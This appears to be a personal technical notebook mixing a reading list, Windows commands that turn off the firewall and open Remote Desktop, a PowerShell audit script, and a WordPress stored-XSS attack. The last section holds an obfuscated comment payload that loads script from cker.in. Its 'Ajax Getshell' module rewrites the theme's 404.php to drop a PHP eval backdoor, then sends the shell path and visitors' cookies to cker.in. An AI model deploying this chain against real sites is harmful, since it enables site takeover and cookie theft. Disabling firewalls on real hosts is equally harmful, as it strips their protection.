1. 《鸟哥的私房菜(服务器架设篇)》 (Vbird's Linux Private Kitchen, Server Setup volume): 30%

2. 《黑客与画家》 (Hackers & Painters): done!

3. 《史蒂夫·乔布斯传》 (Steve Jobs): done!

4. 《黑客大曝光:Web应用程序安全(原书第三版)》 (Hacking Exposed: Web Applications, 3rd Edition): 30%


On Windows Server 2008 and later the firewall service is named mpssvc. To stop the firewall for remote login, the usual command is:
C:\Windows\system32>net stop mpssvc
Windows Firewall 服务正在停止.
Windows Firewall 服务已成功停止。

However, on 2008, simply stopping the firewall service does not allow inbound connections on 3389.

So the service must not be stopped outright; the correct commands to turn the firewall off are:


Disable the Windows Firewall policy:

NetSh Advfirewall set allprofiles state off

Enable the Windows Firewall policy:

NetSh Advfirewall set allprofiles state on

Show the Windows Firewall policy:

Netsh Advfirewall show allprofiles



Enabling 3389 (Remote Desktop) from the command line on Windows 2012 and Windows 2008 Server.

Commands to run:

    wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1


    wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
        ###### Only allow connections from computers running Remote Desktop with Network Level Authentication


    //    wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 0
        ###### Allow connections from computers running any version of Remote Desktop (less secure)


    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

Attached: the one-line command to enable 3389 on Windows 2003 (the quotes around the space keep the key path as a single argument):

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
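As an added defender-side check (this script is not part of the original post), the following PowerShell audit reads back the same settings the commands above change: the mpssvc service state, the per-profile firewall state, the RDP and NLA settings in the TerminalServices WMI namespace, the Terminal Server registry values, and recent firewall-setting change events. It assumes Windows 8 / Server 2012 or later (Get-NetFirewallProfile comes from the NetSecurity module) and an elevated shell.

```powershell
# Added audit script (not from the original post). Run elevated on Windows 8+/Server 2012+.
$findings = @()

# 1. The firewall service itself (mpssvc) should be running.
$svc = Get-Service -Name mpssvc
if ($svc.Status -ne 'Running') { $findings += "mpssvc is $($svc.Status), expected Running" }

# 2. Every profile should be enabled; 'netsh advfirewall set allprofiles state off' clears this.
foreach ($p in Get-NetFirewallProfile) {
    if (-not $p.Enabled) { $findings += "Firewall profile '$($p.Name)' is disabled" }
}

# 3. RDP listener settings: the same WMI classes the wmic commands above modify.
$ns  = 'root/cimv2/TerminalServices'
$ts  = Get-CimInstance -Namespace $ns -ClassName Win32_TerminalServiceSetting
$gen = Get-CimInstance -Namespace $ns -ClassName Win32_TSGeneralSetting -Filter "TerminalName='RDP-Tcp'"
if ($ts.AllowTSConnections -eq 1 -and $gen.UserAuthenticationRequired -ne 1) {
    $findings += 'RDP is enabled without Network Level Authentication'
}

# 4. Registry values touched by the reg add commands above.
$reg = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
if ($reg.fDenyTSConnections -eq 0)   { $findings += 'fDenyTSConnections=0 (RDP connections allowed)' }
if ($reg.fSingleSessionPerUser -eq 0) { $findings += 'fSingleSessionPerUser=0 (multiple sessions per user)' }

# 5. Recent firewall configuration changes from the firewall operational log
#    (IDs 2002/2003: a firewall setting, global or per profile, has changed).
$log = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall'
$events = Get-WinEvent -LogName $log -MaxEvents 50 -ErrorAction SilentlyContinue |
    Where-Object { $_.Id -in 2002, 2003 }
foreach ($e in $events) {
    $first = ($e.Message -split "`n")[0]
    $findings += "Firewall setting changed at $($e.TimeCreated): $first"
}

if ($findings.Count -eq 0) { 'OK: firewall on, RDP policy consistent' } else { $findings }
```

Any line in the output is a deviation from the expected hardened state and should be compared against change records for the host.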


Perfect payload

<abbr title="qweqw style=display:block;width:9900px;position:absolute;height:9900px;top:-100px;left:-100px; onmouseover=eval(unescape(/with%28document%290%5Bbody.appendChild%28createElement%28%27script%27%29%29.src%3D%27%2f%2fcker.in%2f2oPaSh%27%5D/.source))// ">

(Because of the blog software's processing, the entity character that produces the truncation effect, &#8220;, cannot be displayed here; see https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/)

 

Triggered on the front end after an anonymous comment; the overlay covers the full window.

 

Add a receiving parameter to the Xsser platform module, shell, used to receive the getshell address.


 

Xsser platform module code (Ajax Getshell):

var xmlHttp;
var content404, theme, _wpnonce, content;

function createXMLHttpRequest() {
    if (window.ActiveXObject) {
        xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    } else if (window.XMLHttpRequest) {
        xmlHttp = new XMLHttpRequest();
    }
}

function doRequest(url) {
    createXMLHttpRequest();
    xmlHttp.onreadystatechange = handleStateChange;
    xmlHttp.open("GET", url, true);
    xmlHttp.send(null);
}

function handleStateChange() {
    if (xmlHttp.readyState == 4) {
        //alert(xmlHttp.responseText)
        content404 = xmlHttp.responseText;
        theme = new RegExp("<input type=\"hidden\" name=\"theme\" value=\"(.+?)\" />").exec(content404)[1]
        _wpnonce = new RegExp("<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"(.+?)\" />").exec(content404)[1]
        content = new RegExp("(:?aria-describedby=\"newcontent-description\">)([^<]+)").exec(content404)[2]+"<script language=\"php\">fputs(fopen(chr(46).chr(47).chr(65).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(65).chr(93).chr(41).chr(59).chr(63).chr(62));</script>"
        //Post code
        var data = "_wpnonce="+_wpnonce+"&_wp_http_referer="+window.location.pathname+"&newcontent="+escape(content)+"&action=update&file=404.php&theme="+theme+"&scrollto=10&docs-list=&submit=submit"
        doPostRequest("./wp-admin/theme-editor.php", data)
    }
}

doRequest("./wp-admin/theme-editor.php?file=404.php")

function doPostRequest(url, data) {
    createXMLHttpRequest();
    xmlHttp.onreadystatechange = handleStateChangePost;
    xmlHttp.open("POST", url, true);
    xmlHttp.send(data);
}

function handleStateChangePost() {
    if (xmlHttp.readyState == 4) {
        //get 404
        doRequest2("./index.php?p=9999999999999998888")
    }
}

function doRequest2(url) {
    createXMLHttpRequest();
    xmlHttp.onreadystatechange = handleStateChange3;
    xmlHttp.open("GET", url, true);
    xmlHttp.send(null);
}

function handleStateChange3() {
    if (xmlHttp.readyState == 4) {
        //(function(){(new Image).src="http://cker.in/index.php?do=api&id={projectId}&shell="+document.location.origin+document.location.pathname+"./A.php AAA"}())
        //(function(){(new Image).src='http://cker.in/index.php?do=api&id={projectId}&shell='+escape(document.location.origin+document.location.pathname+'./A.php') })()
        (function(){(new Image).src='http://cker.in/index.php?do=api&id={projectId}&shell='+escape(document.location.origin+document.location.pathname+'./A.php')+'&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})())})()
    }
}


On the WordPress 4.2 stored XSS

http://klikki.fi/adv/wordpress2.html

Proof of Concept

Enter as a comment text:

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>